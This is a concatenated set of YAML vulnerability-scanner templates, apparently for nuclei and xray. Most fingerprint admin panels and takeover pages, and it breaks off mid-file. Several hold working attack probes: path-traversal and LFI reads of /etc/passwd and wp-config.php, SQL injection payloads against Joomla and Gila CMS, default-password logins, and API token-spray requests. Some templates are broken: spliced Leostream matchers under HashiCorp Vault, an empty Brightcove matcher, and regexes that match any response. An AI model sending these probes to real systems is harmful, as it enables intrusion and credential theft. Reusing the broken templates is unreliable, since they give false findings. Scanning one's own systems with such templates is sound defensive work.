| info: 4 | name: Publicly exposed Kafdrop Interface 5 | author: dhiyaneshDk 6 | severity: low 7 | tags: exposure,misconfig,kafdrop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Kafdrop: Broker List" 18 | - "Kafka Cluster Overview" 19 | condition: and 20 | -------------------------------------------------------------------------------- /fanruanoa2012-detect.yaml: -------------------------------------------------------------------------------- 1 | id: fanruanoa2012-detect 2 | 3 | info: 4 | name: FanRuanOA2012-detect 5 | author: YanYun 6 | 
severity: info 7 | tags: oa,java,fanruan,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - 'down.download?FM_SYS_ID' -------------------------------------------------------------------------------- /find-config.xml copy.yaml: -------------------------------------------------------------------------------- 1 | id: Configuration_displayed 2 | info: 3 | name: CaseManager displayCmisConfig.jsp Configuration Disclosure 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/CaseManager/welcome/displayCmisConfig.jsp" 11 | 12 | matchers-condition: and 13 | matchers: 14 | 15 | - type: word 16 | words: 17 | - appSettings 18 | 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /hashicorp-vault-detect.yaml: -------------------------------------------------------------------------------- 1 | id: hashicorp-vault-detect 2 | 3 | info: 4 | name: HashiCorp Vault Detect 5 | author: Adam Crosser 6 | severity: info 7 | description: Detects HashiCorp Vault 8 | tags: tech,hashicorp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ui/vault/auth" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'Leostream' # review: these two words belong to a Leostream template, not to HashiCorp Vault (the gutter numbers jump from 19 back to 17, i.e. two files were spliced together in export); the Vault matcher strings must be restored before this template is used 17 | - 'https://www.leostream.com/perpetual-software-license-agreement/' 18 | -------------------------------------------------------------------------------- /openweather.yaml: -------------------------------------------------------------------------------- 1 | id: api-openweather 2 | 3 | info: 4 | name: OpenWeather API Test 5 | author: zzeitlin 6 | reference: https://openweathermap.org/current 7 | severity: info 8 | tags: token-spray,weather,openweather 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" 14 | 15 | matchers: 16 | - 
type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /pbootcms-detect.yaml: -------------------------------------------------------------------------------- 1 | id: pbootcms-detect 2 | 3 | info: 4 | name: PbootCMS Detect 5 | author: princechaddha 6 | severity: info 7 | tags: tech,pbootcms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | regex: 18 | - 'PbootCMS(.*)' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /rstudio-detect.yaml: -------------------------------------------------------------------------------- 1 | id: rstudio-detect 2 | 3 | info: 4 | name: RStudio panel detector 5 | author: philippedelteil 6 | severity: info 7 | tags: panel,rstudio 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 'RStudio' 18 | part: header 19 | - type: status 20 | status: 21 | - 302 22 | -------------------------------------------------------------------------------- /sap-hana-xsengine-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sap-hana-xsengine-panel 2 | 3 | info: 4 | name: SAP HANA XSEngine Admin Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,sap 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sap/hana/xs/formLogin/login.html" 13 | redirects: true 14 | matchers: 15 | - type: word 16 | words: 17 | - "/sap/hana/xs/formLogin/images/sap.png" 18 | part: body 19 | -------------------------------------------------------------------------------- /saprouter-detect.yaml: -------------------------------------------------------------------------------- 1 | id: saprouter-detect 2 | 3 | info: 4 | name: SAPRouter Detection 5 | author: randomstr1ng 6 | 
severity: info 7 | tags: network,sap 8 | 9 | network: 10 | - inputs: 11 | - data: 57484f415245594f553f0a 12 | type: hex 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:3299" 17 | read-size: 1024 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "SAProuter" -------------------------------------------------------------------------------- /totemomail-smtp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: totemomail-smtp-detect 2 | 3 | info: 4 | name: Totemomail SMTP Server Detect 5 | author: princechaddha 6 | severity: info 7 | tags: mail,smtp,network,totemomail 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | read-size: 2048 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:25" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "totemomail" 22 | -------------------------------------------------------------------------------- /a-fingerprinting/azure-kubernetes-service.yaml: -------------------------------------------------------------------------------- 1 | id: azure-kubernetes-service 2 | 3 | info: 4 | name: Detect Azure Kubernetes Service 5 | author: dhiyaneshDk 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /version 14 | expression: response.status == 200 && response.body.bcontains(b"Welcome to Azure Kubernetes Service (AKS)") 15 | expression: r0() -------------------------------------------------------------------------------- /apache/default-tomcat-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-tomcat-page 2 | 3 | info: 4 | name: Tomcat Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,tomcat 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Apache+Tomcat%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Apache Tomcat" 18 | part: body 19 | 
-------------------------------------------------------------------------------- /buttercms.yaml: -------------------------------------------------------------------------------- 1 | id: api-buttercms 2 | 3 | info: 4 | name: ButterCMS API Test 5 | author: zzeitlin 6 | reference: https://buttercms.com/docs/api/#introduction 7 | severity: info 8 | tags: token-spray,buttercms 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | negative: true # review: a negative match on 401 also treats 404, 429 (rate limit) and 5xx as "valid token"; match 200 positively instead to avoid false positives during token spraying 20 | -------------------------------------------------------------------------------- /cve/2007/CNVD-200705-315.yaml: -------------------------------------------------------------------------------- 1 | id: CNNVD-200705-315 # review: the id says CNNVD but the file is named CNVD-200705-315.yaml; align the two so the template can be found by either identifier 2 | 3 | info: 4 | name: Caucho Resin Information Disclosure 5 | author: whynot(https://github.com/notwhy) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /%20../web-inf/ 13 | expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /cve/2018/CVE-2018-12613.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-12613 2 | 3 | info: 4 | name: PhpMyAdmin 4.8.1 Local File Inclusion 5 | author: p0wd3r 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /cve/2019/CNVD-2019-16798.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2019-16798 2 | 3 | info: 4 | name: Coremail 
Information Disclosure 5 | author: cc_ci(https://github.com/cc8ci) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/ 13 | expression: response.status == 200 && response.body.bcontains(bytes("<object name=\"cm_md_db\">")) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /default-movable-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-movable-page 2 | 3 | info: 4 | name: Movable Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | metadata: 8 | shodan-query: title:"Welcome to Movable Type" 9 | tags: tech,movable 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "<title>Welcome to Movable Type" 19 | part: body 20 | -------------------------------------------------------------------------------- /django/django-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: django-admin-panel 2 | 3 | info: 4 | name: Python Django Admin Panel 5 | author: pdteam 6 | severity: info 7 | tags: panel,django,python 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login/?next=/admin/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Django administration" 17 | condition: and 18 | part: body 19 | -------------------------------------------------------------------------------- /entrust-identityguard.yaml: -------------------------------------------------------------------------------- 1 | id: identityguard-selfservice-entrust 2 | 3 | info: 4 | name: IdentityGuard Self-Service by Entrust 5 | author: nodauf 6 | severity: info 7 | tags: panel,identityguard 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: dsl 18 | dsl: 19 | - 
"contains(tolower(body),'identityguardselfservice')" -------------------------------------------------------------------------------- /expn-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: expn-mail-detect 2 | 3 | info: 4 | name: EXPN Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,expn,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-EXPN" -------------------------------------------------------------------------------- /harbor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: harbor-detect 2 | 3 | info: 4 | name: Harbor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,harbor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Harbor" 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /pantheon-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pantheon-takeover 2 | 3 | info: 4 | name: pantheon takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "The gods are wise, but do not know of the site which you seek." 
-------------------------------------------------------------------------------- /symfony/symfony-phpinfo.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-phpinfo 2 | 3 | info: 4 | name: Check Symfony Phpinfo 5 | author: DoubleTake 6 | severity: low 7 | description: Check if /app_dev.php/_profiler/phpinfo exist 8 | tags: phpinfo,symfony 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/app_dev.php/_profiler/phpinfo" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "PHP Version" -------------------------------------------------------------------------------- /uberflip-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: uberflip-takeover 2 | 3 | info: 4 | name: uberflip takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Non-hub domain, The URL you've accessed does not provide a hub." 
-------------------------------------------------------------------------------- /wakatime.yaml: -------------------------------------------------------------------------------- 1 | id: api-wakatime 2 | 3 | info: 4 | name: WakaTime CI API Test 5 | author: zzeitlin 6 | reference: https://wakatime.com/developers 7 | severity: info 8 | tags: token-spray,wakatime 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | negative: true # review: a negative match on 401 also treats 404, 429 (rate limit) and 5xx as "valid token"; match 200 positively instead to avoid false positives during token spraying 20 | -------------------------------------------------------------------------------- /wordpress/wordpress-duplicator-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-duplicator-path-traversal 2 | 3 | info: 4 | name: WordPress duplicator Path Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php" 12 | matchers: 13 | - type: word 14 | words: 15 | - "DB_NAME" 16 | part: body 17 | -------------------------------------------------------------------------------- /amazon-docker-config.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-docker-config 2 | 3 | info: 4 | name: Dockerrun AWS Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,aws,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/Dockerrun.aws.json' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'AWSEBDockerrunVersion' 17 | - 'containerDefinitions' 18 | condition: and 19 | -------------------------------------------------------------------------------- /brightcove-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: brightcove-takeover 2 | 3 | info: 4 | name: brightcove takeover 
detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - '' # review: an empty word matches every response, so every target is reported as a high-severity takeover; the Brightcove fingerprint text was lost in export and must be restored before this template is used -------------------------------------------------------------------------------- /cve/2017/CVE-2017-8917.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-8917 2 | 3 | info: 4 | name: Joomla SQL Injection 5 | author: unknown 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) 13 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /d-default-pwd/mofi4500-default-password.yaml: -------------------------------------------------------------------------------- 1 | id: mofi4500-default-password 2 | 3 | info: 4 | name: MOFI4500-4GXeLTE-V2 Default Login 5 | author: pikpikcu 6 | severity: critical 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: POST 13 | path: /cgi-bin/luci/ 14 | body: username=root&password=admin # review: this form-encoded body is sent with no Content-Type header; if the login does not take effect, add headers with Content-Type: application/x-www-form-urlencoded 15 | expression: response.status == 200 && response.body.bcontains(b'MOFI4500 - General - LuCI') 16 | expression: r0() -------------------------------------------------------------------------------- /defectdojo-panel.yaml: -------------------------------------------------------------------------------- 1 | id: defectdojo-panel 2 | 3 | info: 4 | name: DefectDojo Exposure 5 | author: Adam Crosser 6 | severity: info 7 | metadata: 8 | shodan-query: html:"DefectDojo Logo" 9 | tags: panel,defectdojo 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/login?next=' 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 
"\"DefectDojoGerapy" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /google/google-staticmaps.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlestaticmaps 2 | 3 | info: 4 | name: Google Static Maps API Test 5 | author: zzeitlin 6 | severity: info 7 | tags: token-spray,google,maps 8 | 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /laravel-debug-error.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-debug-error 2 | 3 | info: 4 | name: Larvel Debug Method Enabled 5 | author: dhiyaneshDK 6 | severity: medium 7 | tags: debug,laravel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Whoops! 
There was an error 19 | 20 | - type: status 21 | status: 22 | - 500 -------------------------------------------------------------------------------- /netlify-cms.yaml: -------------------------------------------------------------------------------- 1 | id: netlify-cms 2 | 3 | info: 4 | name: Netlify CMS Admin Panel 5 | author: sullo 6 | severity: info 7 | tags: panel,netlify 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Netlify CMS" 22 | part: body 23 | -------------------------------------------------------------------------------- /simplebooklet-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: simplebooklet-takeover 2 | 3 | info: 4 | name: simplebooklet takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - We can't find this XenForo' 20 | condition: and 21 | -------------------------------------------------------------------------------- /a-fingerprinting/landray-oa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: landray-oa-panel 2 | 3 | info: 4 | name: Landray OA Panel Login 5 | author: YanYun 6 | severity: info 7 | verified: true 8 | description: app="Landray-OA系统" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /login.jsp 15 | expression: response.status == 200 && response.body.bcontains(b'lui_login_input_username') && response.body.bcontains(b'lui_login_input_password') 16 | expression: r0() -------------------------------------------------------------------------------- /anima-takeover.yaml: 
-------------------------------------------------------------------------------- 1 | id: anima-takeover 2 | 3 | info: 4 | name: Anima Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "If this is your website and you've just created it, try refreshing in a minute" -------------------------------------------------------------------------------- /cve/2021/CNVD-2021-10543.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2021-10543 2 | 3 | info: 4 | name: EEA Information Disclosure 5 | author: Search?=Null 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /authenticationserverservlet 13 | expression: response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body) # review: both regexes are a bare (.*?) — their surrounding tag delimiters were probably stripped in export — and match any body, so every HTTP 200 on this path is reported as a high-severity disclosure; restore the delimiters before use 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /extract-firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: extract-firebase-database 2 | 3 | info: 4 | name: Firebase Database Extract Check 5 | author: rafaelwdornelas 6 | severity: info 7 | description: Extract Firebase Database 8 | tags: firebase 9 | 10 | requests: 11 | - raw: 12 | - | # REQUEST 2 13 | GET / HTTP/1.1 14 | Host: {{Hostname}} 15 | 16 | extractors: 17 | - type: regex 18 | regex: 19 | - "([a-z0-9.-]+\\.firebaseio\\.com)" 20 | -------------------------------------------------------------------------------- /kafka-center-login.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-center-login 2 | 3 | info: 4 | name: Kafka Center Login 5 | author: dhiyaneshDK 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Kafka Center" 9 | tags: 
panel,kafka 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers: 19 | - type: word 20 | words: 21 | - 'Kafka Center' 22 | -------------------------------------------------------------------------------- /sophos-mobile-panel-detection.yaml: -------------------------------------------------------------------------------- 1 | id: sophos-mobile-panel-detection 2 | 3 | info: 4 | name: Sophos Mobile Self Service Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/login.xhtml?faces-redirect=true' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Switch to Sophos Mobile Admin" 19 | 20 | -------------------------------------------------------------------------------- /stripe.yaml: -------------------------------------------------------------------------------- 1 | id: api-stripe 2 | 3 | info: 4 | name: Stripe API Test 5 | author: zzeitlin 6 | reference: https://stripe.com/docs/api/authentication 7 | severity: info 8 | tags: token-spray,stripe 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.stripe.com/v1/charges" 14 | headers: 15 | Authorization: Basic {{base64(token + ':')}} 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /wildcard-postmessage.yaml: -------------------------------------------------------------------------------- 1 | id: wildcard-postmessage 2 | 3 | info: 4 | name: Wildcard postMessage detection 5 | author: pdteam 6 | severity: info 7 | reference: 8 | - https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html 9 | tags: xss,postmessage 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - postMessage\([a-zA-Z]+,["']\*["']\) 20 | 
-------------------------------------------------------------------------------- /aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" 13 | 14 | matchers: 15 | - type: regex 16 | part: header 17 | regex: 18 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' -------------------------------------------------------------------------------- /c-unauthorized/airflow-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-unauth 2 | 3 | info: 4 | name: Airflow Unauth 5 | author: pa55w0rd(www.pa55w0rd.online/) 6 | severity: high 7 | verified: true 8 | description: app="APACHE-Airflow" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /admin/ 15 | expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs") 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /clave-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: clave-login-panel 2 | 3 | info: 4 | name: Clave login panel 5 | author: __Fazal 6 | severity: info 7 | tags: panel,clave,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin.php' 13 | 14 | redirects: true 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "Clave" 24 | -------------------------------------------------------------------------------- /cve/2020/CVE-2020-5515.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5515 2 | 3 | info: 4 | name: Gila CMS 1.11.8 SQL 
Injection. 5 | author: PickledFish(https://github.com/PickledFish) 6 | severity: high 7 | 8 | set: 9 | r1: randomInt(200000000, 210000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /admin/sql?query=SELECT%20md5({{r1}}) 15 | expression: response.body.bcontains(bytes(md5(string(r1)))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /d-default-pwd/ns-icg-default-password.yaml: -------------------------------------------------------------------------------- 1 | id: ns-icg-default-password 2 | 3 | info: 4 | name: NS-ICG Default Password 5 | author: pikpikcu 6 | severity: high 7 | verified: true 8 | description: fofa "NS-ICG" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: POST 14 | path: /user/login/checkPermit 15 | body: usrname=ns25000&pass=ns25000 16 | expression: response.status == 200 && response.body.bcontains(b'{"agreed":true}') 17 | expression: r0() -------------------------------------------------------------------------------- /default-jetty-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-jetty-page 2 | 3 | info: 4 | name: Jetty Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22 9 | tags: tech,jetty 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "Powered By Jetty" 19 | part: body 20 | -------------------------------------------------------------------------------- /druid-monitor.yaml: -------------------------------------------------------------------------------- 1 | id: druid-monitor 2 | 3 | info: 4 | name: Druid Monitor Unauthorized Access 5 | author: ohlinge 6 | severity: high 7 | tags: druid,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/druid/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - 
type: word 17 | words: 18 | - 'Druid Stat Index' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /e-vulnerability/natshell-arbitrary-file-read.yaml: -------------------------------------------------------------------------------- 1 | id: natshell-arbitrary-file-read 2 | 3 | info: 4 | name: Natshell Arbitrary File Read 5 | author: Print1n(http://print1n.top) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /download.php?file=../../../../../etc/passwd 13 | expression: response.status == 200 && "(root|toor):[x*]:0:0:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /getresponse-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: getresponse-takeover 2 | 3 | info: 4 | name: getresponse takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'With GetResponse Landing Pages, lead generation has never been easier' -------------------------------------------------------------------------------- /ipstack.yaml: -------------------------------------------------------------------------------- 1 | id: api-ipstack 2 | 3 | info: 4 | name: IPStack API Test 5 | author: zzeitlin 6 | reference: https://ipstack.com/documentation 7 | severity: info 8 | tags: token-spray,ipstack 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | negative: true 19 | words: 20 | - 'invalid_access_key' 21 | -------------------------------------------------------------------------------- /java-rmi-detect.yaml: 
-------------------------------------------------------------------------------- 1 | id: java-rmi-detect 2 | 3 | info: 4 | name: Detect Java RMI Protocol 5 | author: F1tz 6 | severity: info 7 | tags: network,rmi,java 8 | 9 | network: 10 | - inputs: 11 | - data: "{{hex_decode('4a524d4900024b')}}" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | read-size: 1024 16 | 17 | matchers: 18 | - type: regex 19 | part: raw 20 | regex: 21 | - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" 22 | -------------------------------------------------------------------------------- /livezilla-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: livezilla-login-panel 2 | 3 | info: 4 | name: Livezilla login detect 5 | author: __Fazal 6 | severity: info 7 | tags: panel,livezilla,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/mobile/index.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - 'LiveZilla' 23 | -------------------------------------------------------------------------------- /myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | 3 | info: 4 | name: MyuCMS Local File Read 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/yalecaltech/article/details/104908257 9 | tags: myucms,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:.*:0:0:" 19 | -------------------------------------------------------------------------------- /sharecenter-login.yaml: -------------------------------------------------------------------------------- 1 | id: sharecenter-login 2 | 3 | info: 4 | name: ShareCenter Login Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - 
